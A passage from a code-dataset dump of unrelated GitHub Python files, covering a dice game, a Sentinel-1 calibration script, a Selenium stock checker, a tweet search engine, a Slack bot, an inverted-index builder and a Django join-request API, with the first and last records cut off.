e mínimo dos valores das faces do dado;\")\n        print(\"'i' para alterar se você quer ou não os valores individuais de cada jogada no tabuleiro;\")\n        print(\"'e' para sair;\")\n        print(\"'c' para ver os comandos.\")\n        self.entrada_usuario()\n\n    def entrada_usuario(self):\n        # Faz a entrada do usuário, aceita comandos\n        answer = input(\"Deseja jogar os dados ou alterar o valores?: \\n('c' para ver comandos)\\n\")\n        answer = self.tratar(answer)\n\n        if answer == \"\" or answer == \"j\" or answer == ' ':\n            result = self.dado.jogar(separado=self.individual)\n            return result\n        elif isinstance(answer, int):\n            result = self.dado.jogar(n_dados=answer, separado=self.individual)\n            return result\n        elif answer == 'a':\n            self.alterar_max_min()\n        elif answer == \"e\":\n            return False\n        elif answer == 'i':\n            self.alterar_individual()\n        elif answer == 'c':\n            self.comandos()\n        else:\n            print('Não entendi.')\n\n\nif __name__ == '__main__':\n    dado = Dado()\n    inter = Interacao(dado)\n    inter.init()\n\n    while True:\n        play = inter.entrada_usuario()\n        if play is None:\n            pass\n        elif play is False:\n            break\n        else:\n            print(f'Os dados deram {play}')\n","repo_name":"RafaelKC/Dados_de_Tabuleiro","sub_path":"dados_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"27599414435","text":"#!/usr/bin/env python3.6\n\n# Applies Radiometric Calibration and Terrain Correction using ESA SNAP python wrapper to a single GRD product\n\nimport os\nimport re\nimport gc\nimport shutil\nimport argparse\nimport zipfile\nimport fiona\nimport shapely.geometry\nimport snappy\nfrom snappy import ProductIO\nfrom snappy import HashMap\nfrom snappy import GPF\n\nallowed_polarizations = ['HH', 'HV', 'VH', 'VV']\n\ndef main(infolder=False, outfolder=False, polarization=False, basename=False,\n         wktstring=False, shapefile=False, pixel_spacing=100, db=False, cleanup=False, unzip=False):\n    '''main loop for generating calibration products. infolder can be a folder of .SAF/zip files or a .SAFE/zip file'''\n    print('--------------------------------\\nRunning Extraction and Calibration over:{}'.format(infolder))\n    if shapefile:\n        wktstring = get_wkt_from_shapefile(shapefile)\n    if db:\n        print('output products will be generated in decibels.')\n    infolder = unzip_check(infolder, cleanup) # unzip if required\n    # determine if we need to walk the dir\n    if infolder is False or not os.path.exists(infolder):\n        raise Exception('must provide valid input path.')\n    if contains_valid_product(infolder, polarization):\n        # process the file\n        calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n    elif os.path.isdir(infolder):\n        #see if we can process any subfolders\n        for item in os.listdir(infolder):\n            folder_path = os.path.join(infolder, item)\n            subfolder = unzip_check(folder_path, cleanup)\n            if contains_valid_product(subfolder, polarization):\n                calibrate_file(subfolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n\ndef unzip_check(path, cleanup):\n    '''checks the path to see if it's a valid zip file. If true, will unzip and return path to new folder.\n    if False, will return the path.'''\n    if path.lower().endswith('zip') and zipfile.is_zipfile(path):\n        # extract the file\n        filename = os.path.basename(path)\n        base = os.path.splitext(filename)[0] + '.SAFE'\n        folder = os.path.dirname(path)\n        output_path = os.path.join(folder, base)\n        if os.path.exists(output_path):\n            return output_path # don't extract if the folder already exists\n        print('extracting {}...'.format(filename))\n        with zipfile.ZipFile(path,\"r\") as zip_ref:\n            zip_ref.extractall(folder)\n        if cleanup:\n            os.remove(path)\n        return output_path\n    return path\n\ndef contains_valid_product(path, polarization):\n    '''checks to see if the given directory contains a valid .tiff GRD file with the optional polarization'''\n    if not os.path.isdir(path):\n        return False\n    meas_dir = os.path.join(path, 'measurement')\n    if not 'measurement' in os.listdir(path) or not os.path.isdir(meas_dir):\n        return False\n    regex = 's1.*-grd-.*.tiff'\n    if polarization:\n        regex = 's1.*-grd-{}-.*.tiff'.format(polarization.lower())\n    for fil in os.listdir(meas_dir):\n        print('checking {}'.format(fil))\n        if bool(re.search(regex, fil.lower())):\n            return True\n    return False\n\ndef get_wkt_from_shapefile(shapefile_path):\n    '''returns the wkt string from the input shapefile'''\n    if not os.path.exists(shapefile_path):\n        raise Exception(\"invalid shapefile path: {}\".format(shapefile_path))\n    c = fiona.open(shapefile_path)\n    collection = [ shapely.geometry.shape(item['geometry']) for item in c ]\n    return [j.wkt for j in collection][0]\n\ndef calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup):\n    '''calibrate input product'''\n    print('--------------------------\\nCalibrating product: {}'.format(infolder))\n    if outfolder is False:\n        outfolder = os.path.join(os.getcwd(), 's1_preprocessed')\n    if not os.path.exists(outfolder):\n        os.makedirs(outfolder)\n    assert polarization in allowed_polarizations\n    if polarization is False:\n        polarization = ['HH', 'HV', 'VH', 'VV']\n    else:\n        polarization = [polarization]\n    if wktstring is False:\n        wktstring = 'POLYGON ((-94.3242680177268 -68.1554115901846,-94.4799907148995 -78.0386897518533,-133.488922458484 -75.1093782424761,-116.988045118527 -66.0302485803105,-94.3242680177268 -68.1554115901846))'\n\n    GPF.getDefaultInstance().getOperatorSpiRegistry().loadOperatorSpis()\n    HashMap = snappy.jpy.get_type('java.util.HashMap')\n    gc.enable()\n\n    # build folder paths\n    folder = os.path.basename(infolder)\n    for pol in polarization:\n\n        if basename is False:\n            print(\"folder: {}\".format(folder))\n            basename = os.path.basename(folder).rstrip('.SAFE')\n        calib = os.path.join(outfolder, '{}.{}.{}.calibrated'.format(basename, pol, pixel_spacing)) \n        subset = os.path.join(outfolder, '{}.{}.{}.subset'.format(basename, pol, pixel_spacing))\n        terrain = os.path.join(outfolder, '{}.{}.{}.corrected'.format(basename, pol, pixel_spacing))\n        \n        # read product\n        sentinel_1 = ProductIO.readProduct(os.path.join(infolder, \"manifest.safe\")) \n\n        ### CALIBRATION\n        parameters = HashMap() \n        parameters.put('outputSigmaBand', True) \n        parameters.put('sourceBands', 'Intensity_' + pol) \n        parameters.put('selectedPolarisations', pol) \n        parameters.put('outputImageScaleInDb', db) \n        print('Applying radiometric correction: {}'.format(calib))\n        target_0 = GPF.createProduct(\"Calibration\", parameters, sentinel_1) \n        ProductIO.writeProduct(target_0, calib, 'BEAM-DIMAP')\n        \n        ### SUBSET\n        calibration = ProductIO.readProduct(calib + \".dim\") \n        WKTReader = snappy.jpy.get_type('com.vividsolutions.jts.io.WKTReader') \n        geom = WKTReader().read(wktstring)\n        parameters = HashMap()\n        parameters.put('geoRegion', geom)\n        parameters.put('outputImageScaleInDb', db)\n        print('Generating subset file: {}'.format(subset))\n        target_1 = GPF.createProduct(\"Subset\", parameters, calibration)\n        ProductIO.writeProduct(target_1, subset, 'BEAM-DIMAP')\n        \n        ### TERRAIN CORRECTION\n        parameters = HashMap() \n        parameters.put('demResamplingMethod', 'NEAREST_NEIGHBOUR') \n        parameters.put('imgResamplingMethod', 'NEAREST_NEIGHBOUR') \n        parameters.put('demName', 'GETASSE30') \n        parameters.put('pixelSpacingInMeter', pixel_spacing) \n        parameters.put('sourceBands', 'Sigma0_' + pol)\n        print('Applying terrain correction: {}'.format(terrain)) \n        target_2 = GPF.createProduct(\"Terrain-Correction\", parameters, target_1) \n        ProductIO.writeProduct(target_2, terrain, 'GeoTIFF')\n        \n        del target_0\n        del target_1\n        del target_2\n        if cleanup is True:\n            os.remove(calib + '.dim')\n            os.remove(subset + '.dim')\n            shutil.rmtree(subset + '.data')\n            shutil.rmtree(calib + '.data')\n    if cleanup:\n        shutil.rmtree(infolder)\n\ndef parser():\n    '''\n    Construct a parser to parse arguments, returns the parser\n    '''\n    parse = argparse.ArgumentParser(description=\"Apply radiometric and terrain corrections\")\n    parse.add_argument(\"--infolder\", required=True, default=False, help=\"input S1 GRD folder\")\n    parse.add_argument(\"--outfolder\", required=False, default=False, help=\"output folder for calibrated products\")\n    parse.add_argument(\"--polarization\", required=False, default='HH', choices=['HH','VV','VH','HV'], help=\"polarization to process.\")\n    parse.add_argument(\"--basename\", required=False, default=False, help=\"base folder/filename to use for output products\")\n    parse.add_argument(\"--wkt\", required=False, default=False, help=\"wkt polygon bounds\")\n    parse.add_argument(\"--shapefile\", required=False, default=False, help=\"shapefile for bounds\")\n    parse.add_argument(\"--pixel_spacing\", required=False, default=100, type=float, help=\"Pixel spacing in meters\")\n    parse.add_argument(\"--in_decibels\", action=\"store_true\", help=\"output is scaled in decibels\")\n    parse.add_argument(\"--unzip\", action=\"store_true\", help=\"will extract zipped files\")\n    parse.add_argument(\"--cleanup\", action=\"store_true\", help=\"cleanup intermediate files\")\n    return parse\n\nif __name__ == '__main__':\n    args = parser().parse_args()\n    main(infolder=args.infolder, outfolder=args.outfolder, polarization=args.polarization,\n         basename=args.basename, wktstring=args.wkt, shapefile=args.shapefile,\n         pixel_spacing=args.pixel_spacing, db=args.in_decibels, cleanup=args.cleanup, unzip=args.unzip)\n","repo_name":"jlinick/S1GRD_TS","sub_path":"calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20294254065","text":"n, m = map(int, input().split())\r\nmemo = list(list(-1 for i in range(j+1)) for j in range(n+1))\r\nmemo[0][0] = 1\r\nmemo[1][0] = 1\r\nmemo[1][1] = 1\r\nfor i in range(2, n+1):\r\n for j in range(0, i+1):\r\n if j == 0 or j == i:\r\n memo[i][j] = 1\r\n else:\r\n memo[i][j] = memo[i-1][j] + memo[i-1][j-1]\r\nprint(\"%d\" % (memo[n][m]))","repo_name":"SHL0915/BOJ_Problem_Solving","sub_path":"백준/Silver/2407. 조합/조합.py","file_name":"조합.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15100792118","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nf = open(\"WomenShoesLinks_v1.0.1.txt\")\nline = f.readline()\nf.close()\n\noptions = Options()\noptions.headless = True\n\ndriver = webdriver.Chrome(options=options)\ndriver.get(line)\n\nstateCookieBanner = False #not closed\n\nwhile stateCookieBanner == False:\n try:\n # Wait for cookie message\n close_icon = WebDriverWait(driver, 10).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n close_icon.click()\n # Wait for cookie message to disappear\n WebDriverWait(driver, 10).until(ec.invisibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n stateCookieBanner = True\n print(\"\\nCookie banner closed\\n\")\n except Exception as e:\n print(\"\\nCookie banner closed\\n\")\n\nfind_in_store_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"pdp-store-stock-checker-link\"]')))\nfind_in_store_btn.click()\n\nproduct_size_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR,'#pdp-store-stock-checker-app-container > div > aside > div > section > form > div.size-selector > ul > li:nth-child(1) > button')))\nproduct_size_btn.click()\n\nlocation_inp = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/div[2]/div/input')))\nlocation_inp.send_keys('London')\n\ncheck_availability_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/button')))\ncheck_availability_btn.click()\n\nclose_bag = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR, '#pdp-store-stock-checker-app-container > div > aside > div > section > section.store-stock-checker__section.store-stock-checker__popup.store-stock-checker__popup--visible > div > button.reset-btn.icon-ui-close.store-stock-checker__popup-close')))\nclose_bag.click()\n\nlocation_list = driver.find_element_by_xpath('//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/section[2]/ul')\nlocations = location_list.find_elements_by_tag_name('li')\nfor location in locations:\n text = location.text\n print(text)\n\nf = open(\"ProductLocation.txt\", \"x\")\nf = open(\"ProductLocation.txt\", \"a\")\nfor location in locations:\n text = location.text\n f.write(text + \"\\n\\n\")\n \nf.close()\n\ndriver.quit()\n\n\n\n","repo_name":"OmarSaidIbrahim/python-web-automatation-selenium","sub_path":"automata-versions/automatation_v1.0.1.py","file_name":"automatation_v1.0.1.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"13467327116","text":"from index import Index\nfrom score import rank_tweets, CustomScorer, rank_tweets_diversity, Word2VecScorer\nfrom query import Query\nfrom pathlib import Path\nimport argparse\nimport csv\n\nDEFAULT_TWEETS = Path(__file__).parent.parent/'res'/'merge_tweets_wusers.json'\n\ndef parse_main_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-index', default=None, help='Path to load index .pickle file')\n group.add_argument('-tweets', default=DEFAULT_TWEETS, help='Path to load json tweet data')\n parser.add_argument('-K', type=int, default=20, help='Maximum ranking length')\n parser.add_argument('-out', default=None, help='Path to output tsv query rankings')\n rmethod = parser.add_mutually_exclusive_group()\n rmethod.add_argument('-w2v', action='store_true', help='Use word2vec scoring')\n rmethod.add_argument('-custom', action='store_true', help='Use custom scoring (use likes and retweets)')\n rmethod.add_argument('-diversity', action='store_true', help='Use diversified output')\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = parse_main_args()\n\n if args.index != None:\n print('Loading index...')\n index = Index.load(args.index)\n else:\n index = Index()\n print('Loading tweet info into index...')\n index.load_json_tweets(args.tweets)\n\n stop = False\n scorer = None\n if args.w2v:\n scorer = Word2VecScorer(index.tweets.values())\n if args.custom:\n scorer = CustomScorer(index)\n\n ranker = rank_tweets if not args.diversity else rank_tweets_diversity\n\n while not stop:\n str_query = input('Write a query: ')\n query = Query(str_query)\n output = []\n for i, tweet in enumerate(ranker(query, index, K=args.K, scorer=scorer)):\n print(i+1, '.\\n', '-'*100)\n print(str(tweet))\n output.append(tweet)\n if args.out != None:\n with open(args.out, 'at') as out_file:\n tsv_writer = csv.writer(out_file, delimiter='\\t')\n tsv_writer.writerow(['query', str_query])\n for tweet in output:\n tsv_writer.writerow(tweet.row_data())\n","repo_name":"idraveUPF/information_retrieval_final_project","sub_path":"search-engine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20017477180","text":"from ._version import __version__ # noqa: F401\nfrom ._cli import Command, Argument # noqa: F401\nfrom ._precept import Precept # noqa: F401\nfrom ._tools import AutoNameEnum, is_windows # noqa: F401, F403\nfrom ._immutable import ImmutableProp, ImmutableDict, ImmutableMeta # noqa: F401, F403, E501\nfrom ._configs import ( # noqa: F401\n ConfigProperty, Config, ConfigFormat, Nestable, config_factory\n)\nfrom ._executor import AsyncExecutor # noqa: F401\nfrom ._services import Service # noqa: F401\nfrom ._plugins import Plugin # noqa: F401\n\n\n__all__ = [\n '__version__',\n 'Command',\n 'Argument',\n 'Precept',\n 'ImmutableDict',\n 'ImmutableMeta',\n 'ImmutableProp',\n 'ConfigProperty',\n 'Config',\n 'ConfigFormat',\n 'Nestable',\n 'config_factory',\n 'AsyncExecutor',\n 'Service',\n 'Plugin',\n 'is_windows',\n 'AutoNameEnum'\n]\n","repo_name":"T4rk1n/precept","sub_path":"precept/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"31329540507","text":"import os\nimport time\nimport re\nimport slack\nimport network\nfrom dotenv import load_dotenv\n\n#load env variables\nload_dotenv()\n\n#setup RTM client\nslack_token = os.getenv(\"SLACK_BOT_TOKEN\")\nrtm_client = slack.RTMClient(token=slack_token)\nweb_client = slack.WebClient(slack_token)\nmendicant_id = web_client.api_call(\"auth.test\")[\"user_id\"]\nchannels = {} \n\n@slack.RTMClient.run_on(event='message')\ndef unpack_payload(**payload):\n    \"\"\"\n    executes bot command if the command is known\n    \"\"\"\n    data = payload['data']\n    \n    if \"subtype\" in data:\n        return\n\n    web_client = payload['web_client']\n    \n    command_tokens = tokenize_command(data['text'])\n    module = route_command(data, web_client)\n    text = module(command_tokens)\n    web_client.chat_postMessage(channel=data['channel'], text=text)\n\ndef route_command(data, webclient):\n    channel = data['channel']\n\n    switcher={\n        channels['network']:network.handle_command \n    }\n\n    return switcher.get(channel, invalid_module)\n\ndef tokenize_command(command_string):\n\treturn command_string.split()\n\ndef invalid_module(command_tokens):\n    return \"I'm sorry Reclaimer, I don't have subroutines for that module\"\nif __name__ == \"__main__\":\n    convo_list = web_client.api_call(\"conversations.list\")\n    channels = {channel['name']: channel['id'] for channel in convo_list['channels']}\n    rtm_client.start()\n\n","repo_name":"PogopunkXIII/mendicant-bias","sub_path":"mendicant_bias.py","file_name":"mendicant_bias.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26047424162","text":"import pandas as pd\r\nfrom create_tfrecord import tfrecord\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef label_transfer(dataset_dir):\r\n\r\n #convert label from 5 classes to 2 classes\r\n\r\n train_dir = os.path.join(dataset_dir, r\"labels\\train.csv\")\r\n test_dir = os.path.join(dataset_dir, r\"labels\\test.csv\")\r\n\r\n df_train = pd.read_csv(train_dir)\r\n df_test = pd.read_csv(test_dir)\r\n\r\n for index, row in df_train.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_train.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_train.loc[index, 'Retinopathy grade'] = 1\r\n\r\n for index, row in df_test.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_test.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_test.loc[index, 'Retinopathy grade'] = 1\r\n df_train.to_csv(os.path.join(dataset_dir, r\"train_binary.csv\"), index=False)\r\n df_test.to_csv(os.path.join(dataset_dir, r\"test_binary.csv\"), index=False)\r\n return df_train, df_test\r\n\r\ndef EDA(data):\r\n\r\n #Visualize dataset distribution\r\n\r\n data = data['Retinopathy grade']\r\n data_value = data.value_counts()\r\n plt.bar(data_value.index, data_value)\r\n plt.xticks(data_value.index, data_value.index.values)\r\n plt.xlabel(\"labels\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title('Distribution of diabetic retinopathy in test dataset')\r\n plt.show()\r\n\r\n# change dataset_dir to your own dir\r\ndataset_dir = \"E:\\idrid\\IDRID_dataset\"\r\n# convert 5 classification to 2 classification\r\ntrain_dataset, test_dataset = label_transfer(dataset_dir)\r\n# create tfrecord files\r\ntfrecord(train_dataset, test_dataset, dataset_dir)\r\n# visualized data distribution\r\nEDA(train_dataset)\r\nEDA(test_dataset)\r\n","repo_name":"ruizhecao96/DenseNet121_DR","sub_path":"input_pipeline/data_EDA.py","file_name":"data_EDA.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"32382059429","text":"#! /usr/bin/python3\nimport sys\n \nfor index, line in enumerate(sys.stdin):\n inp = line.split()\n if index == 0:\n numOfMachines = int(inp[0])\n nunOfItems = int(inp[1])\n elif index == 1:\n times = [int(i) for i in inp]\n else:\n time = sum(times) + max(times) * (nunOfItems - 1)\n print(time)\nexit(0)","repo_name":"zackeua/Kattis","sub_path":"sequentialmanufacturing/sequentialmanufacturing.py","file_name":"sequentialmanufacturing.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40911998474","text":"from bisect import bisect_left\r\nimport json\r\nimport time\r\nimport pickle\r\n\r\ndef create_dict_terms_termsid(terms):\r\n ret = {}\r\n i = 1\r\n for term in terms:\r\n ret[term] = i\r\n i += 1\r\n return ret\r\n\r\n\r\ndef parsing(file, terms):\r\n # term_id = create_dict_terms_termsid(terms)\r\n with open(file, 'r') as fd:\r\n data = json.load(fd)\r\n tuples = []\r\n for doc in data:\r\n body = doc['.K'] + doc['.W'] + doc['.T'] # Seul le contenu de .K .W et .T nous intéresse\r\n for word in body.split():\r\n if binary_search(terms, word) != -1: # On vérifie que le mot est bien un terme (il appartient à l'ensemble des terms)\r\n tuples.append((word, doc['.I']))\r\n return tuples\r\n\r\ndef create_posting_list(file, terms):\r\n begin = time.time()\r\n l = parsing(file, terms)\r\n print(\"Creating posting list\")\r\n l.sort()\r\n posting_list = {}\r\n a = {l[0][1]: 1}\r\n posting_list[l[0][0]] = a\r\n for i in range(1, len(l)):\r\n if l[i][0] == l[i - 1][0]:\r\n if l[i][1] == l[i - 1][1]:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] += 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] = 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = {l[i][1]: 1}\r\n posting_list[l[i][0]] = a\r\n with open('inverted_index', 'wb') as file:\r\n my_pickler = pickle.Pickler(file)\r\n my_pickler.dump(posting_list)\r\n end = time.time()\r\n print(\"Done in {} seconds\".format(end - begin))\r\n\r\ndef binary_search(a, x, lo=0, hi=None): # can't use a to specify default for hi\r\n hi = hi if hi is not None else len(a) # hi defaults to len(a)\r\n pos = bisect_left(a,x,lo,hi) # find insertion position\r\n return (pos if pos != hi and a[pos] == x else -1)\r\n","repo_name":"kasimansour/Search-engine","sub_path":"RI-cacm/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34342219389","text":"import logging\nfrom datetime import datetime\n\nimport redis.exceptions\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import transaction\nfrom django.http import Http404\nfrom django.utils.translation import gettext as _\nfrom drf_spectacular.utils import (\n    OpenApiResponse,\n    extend_schema,\n    extend_schema_view,\n    inline_serializer,\n)\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom backend.models import Membership, Site\nfrom backend.models.constants import Role\nfrom backend.models.join_request import JoinRequest, JoinRequestStatus\nfrom backend.serializers import fields\nfrom backend.serializers.join_request_serializers import JoinRequestDetailSerializer\nfrom backend.tasks.send_email_tasks import send_email_task\nfrom backend.views import doc_strings\nfrom backend.views.base_views import FVPermissionViewSetMixin, SiteContentViewSetMixin\nfrom backend.views.utils import get_site_url_from_appjson\n\n\n@extend_schema_view(\n    list=extend_schema(\n        description=_(\n            \"A list of pending join requests associated with the specified site.\"\n        ),\n        responses={\n            200: OpenApiResponse(\n                description=doc_strings.success_200_list,\n                response=JoinRequestDetailSerializer,\n            ),\n            403: OpenApiResponse(description=doc_strings.error_403_site_access_denied),\n            404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n        },\n    ),\n    retrieve=extend_schema(\n        description=_(\"Details about a specific join request.\"),\n        responses={\n            200: OpenApiResponse(\n                description=doc_strings.success_200_detail,\n                response=JoinRequestDetailSerializer,\n            ),\n            403: OpenApiResponse(description=doc_strings.error_403),\n            404: OpenApiResponse(description=doc_strings.error_404),\n        },\n    ),\n    create=extend_schema(\n        description=_(\"Create a join request.\"),\n        responses={\n            201: OpenApiResponse(\n                description=doc_strings.success_201,\n                response=JoinRequestDetailSerializer,\n            ),\n            400: OpenApiResponse(description=doc_strings.error_400_validation),\n            403: OpenApiResponse(description=doc_strings.error_403),\n            404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n        },\n    ),\n    destroy=extend_schema(\n        description=_(\"Delete a join request.\"),\n        responses={\n            204: OpenApiResponse(\n                description=doc_strings.success_204_deleted,\n            ),\n            400: OpenApiResponse(description=doc_strings.error_400_validation),\n            403: OpenApiResponse(description=doc_strings.error_403),\n            404: OpenApiResponse(description=doc_strings.error_404),\n        },\n    ),\n    approve=extend_schema(\n        description=_(\n            \"Approve a join request, and create a corresponding site membership.\"\n        ),\n        request=inline_serializer(\n            name=\"Join Request Approval\", fields={\"role\": fields.EnumField(enum=Role)}\n        ),\n        responses={\n            200: OpenApiResponse(\n                description=doc_strings.success_200_edit,\n                response=JoinRequestDetailSerializer,\n            ),\n            400: OpenApiResponse(description=doc_strings.error_400_validation),\n            403: OpenApiResponse(description=doc_strings.error_403),\n            404: OpenApiResponse(description=doc_strings.error_404),\n        },\n    ),\n    ignore=extend_schema(\n        description=_(\"Ignore a join request.\"),\n        request=inline_serializer(name=\"Join Request Ignore\", fields={}),\n        responses={\n            200: OpenApiResponse(\n                description=doc_strings.success_200_edit,\n            ),\n            400: OpenApiResponse(description=doc_strings.error_400_validation),\n            403: OpenApiResponse(description=doc_strings.error_403),\n            404: OpenApiResponse(description=doc_strings.error_404),\n        },\n    ),\n    reject=extend_schema(\n        description=_(\"Reject a join request.\"),\n        request=inline_serializer(name=\"Join Request Rejection\", fields={}),\n        responses={\n            200: OpenApiResponse(\n                description=doc_strings.success_200_edit,\n            ),\n            400: OpenApiResponse(description=doc_strings.error_400_validation),\n            403: OpenApiResponse(description=doc_strings.error_403),\n            404: OpenApiResponse(description=doc_strings.error_404),\n        },\n    ),\n)\nclass JoinRequestViewSet(\n    SiteContentViewSetMixin, FVPermissionViewSetMixin, ModelViewSet\n):\n    \"\"\"\n    API endpoint for managing join requests.\n    \"\"\"\n\n    serializer_class = JoinRequestDetailSerializer\n    http_method_names = [\"get\", \"post\", \"delete\"]\n\n    permission_type_map = {\n        \"create\": \"add\",\n        \"destroy\": \"delete\",\n        \"list\": None,\n        \"partial_update\": \"change\",\n        \"retrieve\": \"view\",\n        \"update\": \"change\",\n        \"approve\": \"change\",  # custom actions use change permission\n        \"ignore\": \"change\",\n        \"reject\": \"change\",\n    }\n\n    def get_queryset(self):\n        site = self.get_validated_site()\n        return JoinRequest.objects.filter(\n            site__slug=site[0].slug, status=JoinRequestStatus.PENDING\n        ).select_related(\n            \"site\", \"site__language\", \"created_by\", \"last_modified_by\", \"user\"\n        )\n\n    def get_validated_site(self):\n        site_slug = self.get_site_slug()\n        site = Site.objects.filter(slug=site_slug)\n\n        if len(site) == 0:\n            raise Http404\n\n        # Check permissions on the site first, skip if the action is create\n        if self.action != \"create\":\n            perm = Site.get_perm(\"view\")\n            if self.request.user.has_perm(perm, site[0]):\n                return site\n            else:\n                raise PermissionDenied\n        else:\n            return site\n\n    @action(detail=True, methods=[\"post\"])\n    def ignore(self, request, site_slug=None, pk=None):\n        join_request = self.get_object()\n\n        self.update_join_request_status(\n            join_request, JoinRequestStatus.IGNORED, request.user\n        )\n\n        serializer = self.get_serializer(join_request)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    @action(detail=True, methods=[\"post\"])\n    def reject(self, request, site_slug=None, pk=None):\n        join_request = self.get_object()\n\n        self.update_join_request_status(\n            join_request, JoinRequestStatus.REJECTED, request.user\n        )\n\n        subject = (\n            f\"Update on your request to join {join_request.site.title} on FirstVoices\"\n        )\n        message = (\n            f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices. \"\n            \"A community administrator has reviewed your request. At this time, your request to view private content \"\n            \"has not been approved. The site may not be accepting members at this time.\\n\\n\"\n            \"Your request may be re-reviewed at a later date.\\n\\n\"\n            \"All decisions regarding requests to view private content are made solely by community-based language \"\n            \"administrators.\\n\\n\"\n            \"If you think this may be a technical error, you can contact FirstVoices staff at \"\n            \"hello@firstvoices.com.\\n\\n\"\n        )\n\n        try:\n            send_email_task.apply_async((subject, message, [join_request.user.email]))\n        except redis.exceptions.ConnectionError as e:\n            logger = logging.getLogger(__name__)\n            logger.error(f\"Could not queue task. Error: {e}\")\n\n        serializer = self.get_serializer(join_request)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    @action(detail=True, methods=[\"post\"])\n    def approve(self, request, site_slug=None, pk=None):\n        if \"role\" not in request.data:\n            raise ValidationError({\"role\": [\"This field is required.\"]})\n\n        try:\n            role_value = request.data[\"role\"]\n            role = Role[role_value.upper()]\n        except KeyError:\n            raise ValidationError(\n                {\"role\": [\"value must be one of: \" + \", \".join(Role.names)]}\n            )\n\n        join_request = self.get_object()\n\n        has_membership = Membership.objects.filter(\n            site=join_request.site, user=join_request.user\n        ).first()\n        if has_membership:\n            raise ValidationError(\"User already has a membership on this site\")\n\n        with transaction.atomic():\n            Membership.objects.create(\n                user=join_request.user, site=join_request.site, role=role\n            )\n            self.update_join_request_status(\n                join_request, JoinRequestStatus.APPROVED, request.user\n            )\n\n        subject = f\"Welcome to the {join_request.site.title} FirstVoices site!\"\n        message = (\n            f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices.\\n\"\n            \"A community administrator has approved your request.\\n\\n\"\n            f\"You are now approved on the {join_request.site.title} site with the role: {role.label}\\n\"\n            \"\"\n        )\n        base_url = get_site_url_from_appjson(join_request.site)\n        if base_url:\n            message = (\n                message\n                + f\"Visit the {join_request.site.title} site here: {base_url}\\n\\n\"\n            )\n        else:\n            message = message + \"\\n\"\n\n        try:\n            send_email_task.apply_async((subject, message, [join_request.user.email]))\n        except redis.exceptions.ConnectionError as e:\n            logger = logging.getLogger(__name__)\n            logger.error(f\"Could not queue task. Error: {e}\")\n\n        serializer = self.get_serializer(join_request)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    def update_join_request_status(self, join_request, status, 